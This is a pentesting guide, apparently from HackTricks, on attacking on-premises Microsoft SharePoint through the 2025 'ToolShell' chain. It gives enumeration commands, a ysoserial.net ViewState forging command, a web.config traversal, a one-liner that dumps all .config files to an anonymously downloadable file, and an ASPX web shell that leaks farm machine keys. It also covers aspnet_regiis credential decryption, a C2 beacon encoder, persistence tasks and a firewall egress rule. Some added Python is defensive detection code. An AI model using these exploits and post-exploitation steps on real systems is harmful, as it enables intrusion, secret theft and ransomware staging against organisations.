Microsoft SharePoint – Pentesting & Exploitation

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Microsoft SharePoint (on-premises) is built on ASP.NET/IIS. Most of the classic web attack surface (ViewState, web.config, web shells, etc.) is therefore present, but SharePoint also ships hundreds of proprietary ASPX pages and web services that dramatically widen the exposed attack surface. This page collects practical tricks to enumerate, exploit and persist inside SharePoint environments, with emphasis on the 2025 exploit chain disclosed by Unit42 (CVE-2025-49704/49706/53770/53771).

1. Quick enumeration

# favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -  # returns WCF/XSI

# version leakage (often in JS)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"

# interesting standard paths
/_layouts/15/ToolPane.aspx               # vulnerable page used in 2025 exploit chain
/_vti_bin/Lists.asmx                     # legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx

# enumerate sites & site collections (requires at least anonymous access)
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>
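Added example (not code from the page or from any of the tools it lists): an offline fingerprinting helper. Every SharePoint response carries a MicrosoftSharePointTeamServices header with the farm build; the mapping below uses the RTM build ranges (15.0 = 2013, 16.0.4xxx-9xxx = 2016, 16.0.10xxx = 2019, 16.0.14xxx+ = Subscription Edition), which should be treated as approximate thresholds rather than an exact table. The sample header block is constructed.

```python
"""Fingerprint a SharePoint host from a raw HTTP header block (offline helper).

Added example; the build-to-release thresholds are assumptions based on the
RTM build numbers, not an authoritative table.
"""
import re

# Standard paths worth probing on every host (from the enumeration list above).
PROBE_PATHS = [
    "/_layouts/15/ToolPane.aspx",
    "/_vti_bin/Lists.asmx",
    "/_vti_bin/client.svc",
    "/_catalogs/masterpage/Forms/AllItems.aspx",
]

HEADER = "microsoftsharepointteamservices"


def parse_headers(raw: str) -> dict:
    """Parse a raw HTTP response header block into a lower-cased dict."""
    headers = {}
    for line in raw.splitlines():
        if ":" in line and not line.startswith(("HTTP/", " ", "\t")):
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return headers


def classify_build(build: str) -> str:
    """Map a MicrosoftSharePointTeamServices value to the product generation.

    The header is usually 16.0.0.NNNNN (build in the 4th field) but full
    16.0.NNNNN.NNNNN version strings are handled too.
    """
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)$", build.strip())
    if not m:
        return "unknown"
    major, _, third, fourth = (int(x) for x in m.groups())
    build_no = third or fourth
    if major == 15:
        return "SharePoint 2013"
    if major == 16:
        if build_no >= 14000:          # assumption: SE RTM is 16.0.14326
            return "SharePoint Subscription Edition"
        if build_no >= 10000:          # assumption: 2019 RTM is 16.0.10337
            return "SharePoint 2019"
        return "SharePoint 2016"       # 2016 RTM is 16.0.4351
    return "unknown"


def fingerprint(raw_headers: str, host: str = "https://<host>") -> dict:
    """Return the detected release plus the full probe URL list for the host."""
    h = parse_headers(raw_headers)
    build = h.get(HEADER, "")
    return {
        "build": build,
        "release": classify_build(build) if build else "no SharePoint header",
        "server": h.get("server", ""),
        "probe": [host + p for p in PROBE_PATHS],
    }


# Constructed sample response (not captured from a real host).
SAMPLE = """HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 16.0.0.10396
X-SharePointHealthScore: 0
"""

if __name__ == "__main__":
    print(fingerprint(SAMPLE))
```

Feed it the output of `curl -sI https://<host>/` to get the release and a ready-made list of URLs to probe next.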

2. 2025 exploit chain (a.k.a. "ToolShell")

2.1 CVE-2025-49704 – Code injection in ToolPane.aspx

/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload> lets arbitrary server-side include code be injected into the page, which ASP.NET then compiles. An attacker can embed C# that calls Process.Start() and plant a malicious ViewState.

2.2 CVE-2025-49706 – Authentication bypass (spoofing)

The same page trusts the X-Forms_BaseUrl header to determine the site context. Pointing it at /_layouts/15/ lets the request reach the page without authenticating, skipping the MFA/SSO enforced on the root site. Note that the public ToolShell PoC achieves the same effect with a spoofed Referer of /_layouts/SignOut.aspx, so hunt for both header values.

2.3 CVE-2025-53770 – Unauthenticated ViewState deserialization → RCE

Once the attacker controls a gadget in ToolPane.aspx, a crafted __VIEWSTATE value triggers .NET deserialization (ObjectStateFormatter) inside w3wp.exe, leading to code execution.

On ASP.NET 4.5.2 and later the ViewState MAC cannot be disabled, so the value must carry a valid signature: steal the validationKey/decryptionKey from any web.config (see 2.4) and forge the payload with the ViewState plugin of ysoserial.net (the generator is derived from --path/--apppath; alternatively pass --generator with the page's __VIEWSTATEGENERATOR value):

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" ^
  --path="/_layouts/15/ToolPane.aspx" --apppath="/" ^
  --validationalg="HMACSHA256" --validationkey="<hex>" ^
  --decryptionalg="AES" --decryptionkey="<hex>"

For a detailed explanation of ASP.NET ViewState abuse, read:

Exploiting __VIEWSTATE without knowing the secrets

2.4 CVE-2025-53771 – Path traversal / web.config disclosure

Sending a crafted Source parameter to ToolPane.aspx (e.g. ../../../../web.config) returns the target file, leaking:

  • <machineKey validationKey="…" decryptionKey="…"> ➜ forge ViewState / ASPXAUTH cookies
  • connection strings & secrets.

2.5 ToolShell workflow observed in Ink Dragon intrusions

Check Point mapped how Ink Dragon operationalised the ToolShell chain months before Microsoft shipped fixes:

  • Header spoofing for auth bypass – the actor sends POSTs to /_layouts/15/ToolPane.aspx with Referer: https://<victim>/_layouts/15/ plus a forged X-Forms_BaseUrl. Those headers convince SharePoint that the request originates from a trusted layout page and skip the front-door authentication entirely (CVE-2025-49706/CVE-2025-53771).
  • Serialized gadget in the same request – the body carries attacker-controlled ViewState/ToolPart data that reaches the vulnerable formatter on the server (CVE-2025-49704/CVE-2025-53770). The payload is typically a ysoserial.net chain that runs inside w3wp.exe without ever touching disk.
  • Internet-scale scanning – July 2025 telemetry shows them enumerating every reachable /_layouts/15/ToolPane.aspx endpoint and replaying a dictionary of leaked <machineKey> pairs. Any site that copied a sample validationKey from documentation can be compromised even when fully patched (see the ViewState page for the signing workflow).
  • Immediate staging – successful exploitation drops a loader or PowerShell stager that: (1) dumps every web.config, (2) plants an ASPX web shell as fallback access, and (3) schedules a local Potato privesc to escape the IIS worker.
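Added example (not from the page or from Check Point's report): a detection pass over IIS W3C logs for the request pattern described in sections 2.1 to 2.5, plus the drop names from section 3. It flags POSTs to ToolPane.aspx in edit mode whose Referer is either the page's /_layouts/15/ value or the public PoC's /_layouts/SignOut.aspx, marks the ones without an authenticated cs-username, and catches any fetch of spinstall0.aspx or debug_dev.js. The log lines are constructed; field order comes from the #Fields: directive, as in real IIS logs.

```python
"""Hunt IIS W3C logs for ToolShell-style requests (added example, constructed data)."""
from typing import Iterator

TOOLPANE = "/_layouts/15/toolpane.aspx"
DROP_NAMES = ("spinstall0.aspx", "debug_dev.js")
# Referer values: the one the page attributes to Ink Dragon and the public PoC's SignOut trick
SUSPICIOUS_REFERERS = ("/_layouts/signout.aspx", "/_layouts/15/")


def parse_iis(log: str) -> Iterator[dict]:
    """Yield one dict per log row, keyed by the names in the #Fields: line."""
    fields: list = []
    for line in log.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed row; IIS writes '-' for empty fields so counts normally match
        yield dict(zip(fields, values))


def score(entry: dict) -> list:
    """Return the indicator names matched by a single log entry."""
    hits = []
    stem = entry.get("cs-uri-stem", "").lower()
    query = entry.get("cs-uri-query", "").lower()
    referer = entry.get("cs(Referer)", "").lower()
    if stem == TOOLPANE and entry.get("cs-method") == "POST":
        hits.append("toolpane_post")
        if "displaymode=edit" in query:
            hits.append("toolpane_editmode")
        if any(referer.endswith(r) for r in SUSPICIOUS_REFERERS):
            hits.append("spoofed_referer")
        if entry.get("cs-username", "-") == "-":
            hits.append("unauthenticated")
    if any(stem.endswith("/" + n) for n in DROP_NAMES):
        hits.append("webshell_or_loot:" + stem.rsplit("/", 1)[-1])
    return hits


def hunt(log: str) -> list:
    """Return (client ip, uri stem, hits) for every entry with at least one indicator."""
    out = []
    for entry in parse_iis(log):
        hits = score(entry)
        if hits:
            out.append((entry["c-ip"], entry["cs-uri-stem"], hits))
    return out


# Constructed sample in IIS W3C format (not real telemetry); CORP\bob is a legitimate editor.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-18 09:12:01 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\alice 10.0.0.77 Mozilla/5.0 https://sp.corp.local/ 200
2025-07-18 09:12:44 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.9 python-requests/2.32 /_layouts/SignOut.aspx 200
2025-07-18 09:12:46 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.9 python-requests/2.32 - 200
2025-07-18 09:13:10 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CORP\\bob 10.0.0.78 Mozilla/5.0 https://sp.corp.local/_layouts/15/settings.aspx 200
"""

if __name__ == "__main__":
    for ip, stem, hits in hunt(SAMPLE_LOG):
        print(ip, stem, hits)
```

A legitimate page edit also POSTs to ToolPane.aspx, so treat toolpane_post alone as noise and escalate on spoofed_referer, unauthenticated, or any webshell_or_loot hit; point the parser at C:\inetpub\logs\LogFiles\W3SVC*\*.log on each front-end.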

3. Post-exploitation recipes observed in the wild

3.1 Exfiltrate every .config file (variation-1)

cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"

The resulting debug_dev.js can be downloaded anonymously and contains the whole sensitive configuration.

3.2 Drop a Base64-encoded ASPX web shell (variation-2)

powershell.exe -EncodedCommand <base64>

Decoded payload example (shortened):

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Web.Configuration" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
    // System.Web.Security.MachineKey exposes no key properties; the shell reaches the
    // internal MachineKeySection.GetApplicationConfig() via reflection, which returns the
    // effective farm keys even when web.config says AutoGenerate
    var cfg = (MachineKeySection)typeof(MachineKeySection)
        .GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic)
        .Invoke(null, null);
    Response.Write(cfg.ValidationKey + "|" + cfg.Validation + "|" + cfg.DecryptionKey + "|" + cfg.Decryption + "|" + cfg.CompatibilityMode);
    // echo secrets or invoke cmd
}
</script>

The decoded shell is written to:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

The shell exposes endpoints to read / rotate machine keys which allows forging ViewState and ASPXAUTH cookies across the farm.

3.3 Obfuscated variant (variation-3)

Same shell but:

  • dropped under ...\15\TEMPLATE\LAYOUTS\
  • variable names reduced to single letters
  • Thread.Sleep(<ms>) added for sandbox-evasion & timing-based AV bypass.

3.4 AK47C2 multi-protocol backdoor & X2ANYLOCK ransomware (observed 2025-2026)

Recent incident-response investigations (Unit42 “Project AK47”) show how attackers leverage the ToolShell chain after initial RCE to deploy a dual-channel C2 implant and ransomware in SharePoint environments:

AK47C2 – dnsclient variant

  • Hard-coded DNS server: 10.7.66.10 communicating with authoritative domain update.updatemicfosoft.com.
  • Messages are JSON objects XOR-encrypted with the static key VHBD@H, hex-encoded and embedded as sub-domain labels.
{"cmd":"<COMMAND>","cmd_id":"<ID>"}
  • Long queries are chunked and prefixed with s, then re-assembled server-side.
  • Server replies in TXT records carrying the same XOR/hex scheme:
{"cmd":"<COMMAND>","cmd_id":"<ID>","type":"result","fqdn":"<HOST>","result":"<OUTPUT>"}
  • Version 202504 introduced a simplified format <COMMAND>::<SESSION_KEY> and chunk markers 1, 2, a.

AK47C2 – httpclient variant

  • Re-uses the exact JSON & XOR routine but sends the hex blob in the HTTP POST body via libcurl (CURLOPT_POSTFIELDS, etc.).
  • Same task/result workflow allowing:
  • Arbitrary shell command execution.
  • Dynamic sleep interval and kill-switch instructions.
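Added example covering both the dnsclient and httpclient variants above (it is not malware code from the Unit42 report). What the page gives: JSON task/result objects, XOR with the static key VHBD@H, hex encoding, sub-domain labels for the DNS channel with long messages chunked and prefixed with s, TXT records for replies, and the same hex blob in an HTTP POST body for the httpclient variant. Everything else is an assumption made so the code runs: repeating-key XOR, 56-character labels (DNS labels may not exceed 63 bytes), an s<index>- prefix so the server can reorder chunks, and the C2 domain update.updatemicfosoft.com taken from the page. The sample task and result are constructed.

```python
"""Encode/decode AK47C2-style beacons (added example, assumptions noted inline)."""
import json

KEY = b"VHBD@H"                        # static XOR key named on the page
C2_DOMAIN = "update.updatemicfosoft.com"
LABEL_LEN = 56                         # assumption: "s<n>-" + 56 hex chars stays under 63 bytes


def xor(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR (assumption); symmetric, so the same call decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_blob(msg: dict) -> str:
    """JSON -> XOR -> hex; this is the blob both the DNS and HTTP channels carry."""
    return xor(json.dumps(msg, separators=(",", ":")).encode()).hex()


def decode_blob(blob: str) -> dict:
    return json.loads(xor(bytes.fromhex(blob)))


def to_queries(msg: dict) -> list:
    """dnsclient side: one query name per chunk, chunks prefixed with 's' as the page says."""
    blob = encode_blob(msg)
    chunks = [blob[i:i + LABEL_LEN] for i in range(0, len(blob), LABEL_LEN)]
    if len(chunks) == 1:
        return [f"{chunks[0]}.{C2_DOMAIN}"]
    # assumption: the prefix carries a chunk index so the server can reorder
    return [f"s{i}-{c}.{C2_DOMAIN}" for i, c in enumerate(chunks)]


def from_queries(names: list) -> dict:
    """Server side: strip the domain, reassemble chunks (hex never contains 's'), decode."""
    parts = {}
    for name in names:
        label = name[: -(len(C2_DOMAIN) + 1)]
        if label.startswith("s") and "-" in label:
            idx, _, data = label[1:].partition("-")
            parts[int(idx)] = data
        else:
            parts[0] = label
    return decode_blob("".join(parts[i] for i in sorted(parts)))


def to_txt(msg: dict) -> str:
    """Reply side: same blob, carried as TXT record data."""
    return encode_blob(msg)


def to_http_body(msg: dict) -> bytes:
    """httpclient variant: the same hex blob becomes the POST body (CURLOPT_POSTFIELDS)."""
    return encode_blob(msg).encode()


# Constructed sample exchange (not captured traffic).
TASK = {"cmd": "whoami", "cmd_id": "7"}
RESULT = {"cmd": "whoami", "cmd_id": "7", "type": "result",
          "fqdn": "SP01.corp.local", "result": "iis apppool\\sharepoint"}

if __name__ == "__main__":
    for q in to_queries(RESULT):
        print(q)
    print(from_queries(to_queries(RESULT)))
    print(decode_blob(to_txt(TASK)))
```

For hunting, run from_queries over DNS logs grouped by source host and C2 domain: genuine hex-only labels (or s<n>- prefixed ones) that decode to JSON with cmd/cmd_id keys are a strong signal even if the exact chunk format differs from the assumption here.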

X2ANYLOCK ransomware

  • 64-bit C++ payload loaded through DLL side-loading (see below).
  • Employs AES-CBC for file data + RSA-2048 to wrap the AES key, then appends the extension .x2anylock.
  • Recursively encrypts local drives and discovered SMB shares; skips system paths.
  • Drops clear-text note How to decrypt my data.txt embedding a static Tox ID for negotiations.
  • Contains an internal kill-switch:
if (file_mod_time >= "2026-06-06") exit(0);

DLL side-loading chain

  1. Attacker writes dllhijacked.dll/My7zdllhijacked.dll next to a legitimate 7z.exe.
  2. SharePoint-spawned w3wp.exe launches 7z.exe, which loads the malicious DLL because of Windows search order, invoking the ransomware entrypoint in memory.
  3. A separate LockBit loader observed (bbb.msi, clink_x86.exe, clink_dll_x86.dll) decrypts shell-code and performs DLL hollowing into d3dl1.dll to run LockBit 3.0.

[!INFO] The same static Tox ID found in X2ANYLOCK appears in leaked LockBit databases, suggesting affiliate overlap.

3.5 Turning SharePoint loot into lateral movement

  • Decrypt every protected section – once seated on the web tier, run aspnet_regiis.exe -pdf "connectionStrings" "C:\inetpub\wwwroot\wss\VirtualDirectories\<port>" (or -pdf "appSettings") to rewrite the <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider"> block in clear text; if you would rather not modify the file, export the RSA key container with aspnet_regiis.exe -px "NetFrameworkConfigurationKey" C:\temp\keys.xml -pri (the default container name; check keyContainerName in the provider definition) and decrypt offline. Ink Dragon repeatedly harvested SQL logins, SMTP relays and custom service credentials this way.
  • Recycle app-pool accounts across farms – many enterprises reuse the same domain account for IIS APPPOOL\SharePoint on every front-end. After decrypting identity impersonate="..." blocks or reading ApplicationHost.config, test the credential over SMB/RDP/WinRM to every sibling server. In multiple incidents the account was also a local administrator, allowing psexec, sc create, or scheduled-task staging without triggering password sprays.
  • Abuse leaked <machineKey> values internally – even if the internet perimeter gets patched, reusing the same validationKey/decryptionKey allows lateral ViewState exploitation between internal SharePoint zones that trust each other.

3.6 Persistence patterns witnessed in 2025 intrusions

  • Scheduled tasks – a one-shot task named SYSCHECK (or other health-themed names) is created with /ru SYSTEM /sc once /st <hh:mm> to bootstrap the next-stage loader (commonly a renamed conhost.exe). Because it is run-once, telemetry often misses it unless historic task XML is preserved.
  • Masqueraded services – services such as WindowsTempUpdate, WaaSMaintainer, or MicrosoftTelemetryHost are installed via sc create pointing at the sideloading triad directory. The binaries keep their original AMD/Realtek/NVIDIA signatures but are renamed to match Windows components; comparing the on-disk name with the OriginalFileName PE field is a quick integrity check.
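Added example (not from the page): a triage pass over exported scheduled-task XML for the run-once SYSTEM pattern described above. It scores a task on four signals: principal is SYSTEM, a single TimeTrigger with no repetition (what /sc once produces), an action outside the Windows or Program Files directories, and a borrowed Windows binary name such as conhost.exe living outside System32. The element names used (Principals/Principal/UserId, Triggers/TimeTrigger, Actions/Exec/Command) are the standard task-scheduler schema; the two task definitions are constructed, and the suspicious threshold of three reasons is an assumption.

```python
"""Score scheduled-task XML for one-shot SYSTEM loaders (added example, constructed data).

Export a task with:  schtasks /Query /TN <name> /XML
or read the definitions under C:\\Windows\\System32\\Tasks\\.
"""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system"}
WINDOWS_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TRUSTED_DIRS = WINDOWS_DIRS + ("c:\\program files\\", "c:\\program files (x86)\\")
# names attackers borrow for renamed loaders (the page mentions a renamed conhost.exe)
BORROWED_NAMES = {"conhost.exe", "svchost.exe", "dllhost.exe", "rundll32.exe"}


def triage_task(xml_text: str) -> dict:
    """Return the command, principal, matched reasons and a verdict for one task."""
    root = ET.fromstring(xml_text)

    def text(path: str) -> str:
        el = root.find(path, NS)
        return (el.text or "").strip() if el is not None else ""

    user = text("t:Principals/t:Principal/t:UserId")
    time_trigger = root.find("t:Triggers/t:TimeTrigger", NS)
    repeats = time_trigger is not None and time_trigger.find("t:Repetition", NS) is not None
    other_triggers = [c for c in root.findall("t:Triggers/*", NS)
                      if not c.tag.endswith("}TimeTrigger")]
    command = text("t:Actions/t:Exec/t:Command").strip('"')
    lc = command.lower()
    exe = lc.rsplit("\\", 1)[-1]

    reasons = []
    if user.lower() in SYSTEM_IDS:
        reasons.append("runs_as_system")
    if time_trigger is not None and not repeats and not other_triggers:
        reasons.append("one_shot")                      # /sc once, fires a single time
    if command and not lc.startswith(TRUSTED_DIRS):
        reasons.append("untrusted_path")
    if exe in BORROWED_NAMES and not lc.startswith(WINDOWS_DIRS):
        reasons.append("windows_binary_name_outside_windows_dir")
    # assumption: three or more signals is worth an analyst's time
    return {"command": command, "user": user, "reasons": reasons,
            "suspicious": len(reasons) >= 3}


# Constructed task definitions (not exported from a real host).
SYSCHECK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <StartBoundary>2025-07-19T03:15:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\\ProgramData\\Microsoft\\Health\\conhost.exe"</Command>
    </Exec>
  </Actions>
</Task>"""

BENIGN_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-01-01T02:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>CORP\\svc_backup</UserId>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\wbadmin.exe</Command>
      <Arguments>start backup -quiet</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    print(triage_task(SYSCHECK_XML))
    print(triage_task(BENIGN_XML))
```

Because the task deletes nothing but runs once, the XML under C:\Windows\System32\Tasks usually survives long enough to be collected; pair this with Security event 4698 (task created) on the front-ends.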

3.7 Host firewall downgrades for relay traffic

Ink Dragon routinely adds a permissive outbound rule that masquerades as Defender maintenance so ShadowPad/FinalDraft traffic can exit on any port:

netsh advfirewall firewall add rule name="Microsoft MsMpEng" dir=out action=allow program="C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe" enable=yes profile=any

Because the rule is created locally (not via GPO) and uses the legitimate Defender binary as program=, most SOC baselines ignore it, yet it opens Any ➜ Any egress.


Related tricks

  • IIS post-exploitation & web.config abuse:

IIS - Internet Information Services
